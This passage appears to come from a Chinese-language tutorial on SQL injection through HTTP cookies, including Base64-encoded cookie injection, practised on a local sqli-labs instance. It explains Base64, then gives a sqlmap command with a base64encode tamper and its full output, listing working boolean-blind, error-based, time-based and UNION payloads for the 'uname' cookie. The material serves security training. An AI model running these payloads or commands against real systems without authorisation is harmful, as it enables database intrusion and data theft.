Payload: uname=-3483' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6a71,0x68794470424245485a554f75584c426264475469635964656c73516178775061426c516350565255,0x7170707171)-- -; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
---
do you want to exploit this SQL injection? [Y/n] Y
[14:10:39] [INFO] the back-end DBMS is MySQL
[14:10:39] [INFO] fetching banner
[14:10:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.5.53'
'14:10:51] [INFO] skipping 'http://127.0.0.1/sqli-labs/Less-20/index.php
[14:10:51] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'XXX\sqlmap\output\results-03102020_0208pm.csv'
[*] ending @ 14:10:51 /2020-03-10/
5.HTTP头中的SQL注入-cookie Base64注入
base64介绍
base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。
base64是网络上最常见的用于传输8Bit字节码的编码方式之一,是一种基于64个可打印字符来表示二进制数据的方法。
转换方法:
将原始内容转换为二进制,从左到右依次取6位,然后在最高补两位0,形成新的内容。
编码规则:
- 把3个字符变成4个字符
- 每76个字符加一个换行符
- 最后的结束符也要处理
base64是可逆的,编码后可以转换回来。
base64编码可点击http://tool.oschina.net/encrypt?type=3。
Base64注入
使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测,例如:
明文" or 1=1 #对应密文IiBvciAxPTEgIw==。
访问http://127.0.0.1/sqli-labs/Less-22/,并登录测试,发现会报错,这是因为没有设置时区,需要在php配置文件中进行设置并重启,再次刷新即可正常访问,操作如下:
可以得到界面如下:
其中有uname = YWRtaW4=,YWRtaW4=的base64解码即为admin。
将反斜线\加入admin后进行base64编码,再编辑重发,如下:
报错信息如下:
‘“admin” LIMIT 0,1’
即发现注入点,可以进行注入测试。
sqlmap安全测试
获取请求内容并保存到target.txt操作如下:
python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt --banner --batch --level 3 --dbms mysql --tamper base64encode.py
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:13:42 /2020-03-10/
[19:13:42] [INFO] parsing HTTP request from 'XXXX\target.txt'
[19:13:42] [INFO] loading tamper module 'base64encode'
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:13:43] [INFO] testing connection to the target URL
[19:13:45] [INFO] testing if the target URL content is stable
[19:13:47] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:13:47] [INFO] testing if Cookie parameter 'uname' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[19:13:49] [WARNING] reflective value(s) found and filtering out
[19:13:49] [INFO] Cookie parameter 'uname' appears to be dynamic
[19:13:51] [INFO] heuristic (basic) test shows that Cookie parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[19:13:53] [INFO] testing for SQL injection on Cookie parameter 'uname'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[19:13:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[19:16:44] [INFO] Cookie parameter 'uname' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable
[19:16:44] [INFO] testing 'Generic inline queries'
[19:16:46] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:16:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:16:50] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:16:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:16:54] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:16:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:16:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:17:00] [INFO] Cookie parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:17:00] [INFO] testing 'MySQL inline queries'
[19:17:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:17:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:17:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:17:10] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:17:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:17:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:17:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:17:32] [INFO] Cookie parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:17:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:17:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:17:38] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:17:46] [INFO] target URL appears to have 3 columns in query
[19:17:51] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 112 HTTP(s) requests:
---
Parameter: uname (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: uname=YWRtaW4=" AND 2468=(SELECT (CASE WHEN (2468=2468) THEN 2468 ELSE (SELECT 7798 UNION SELECT 4608) END))-- -; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=YWRtaW4=" AND (SELECT 8260 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,(SELECT (ELT(8260=8260,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "FZVA"="FZVA; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=YWRtaW4=" AND (SELECT 1385 FROM (SELECT(SLEEP(5)))SWci) AND "YNkC"="YNkC; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: uname=YWRtaW4=" UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7871,0x6970776252484979597566737647444b636c46764345464e674142776d746348467946594c456c4e,0x716b626b71)-- -; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
---
[19:17:51] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:17:51] [INFO] the back-end DBMS is MySQL
[19:17:51] [INFO] fetching banner
[19:18:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.5.53'
[19:18:03] [INFO] fetched data logged to text files under 'XXX\sqlmap\output\127.0.0.1'
[*] ending @ 19:18:03 /2020-03-10/
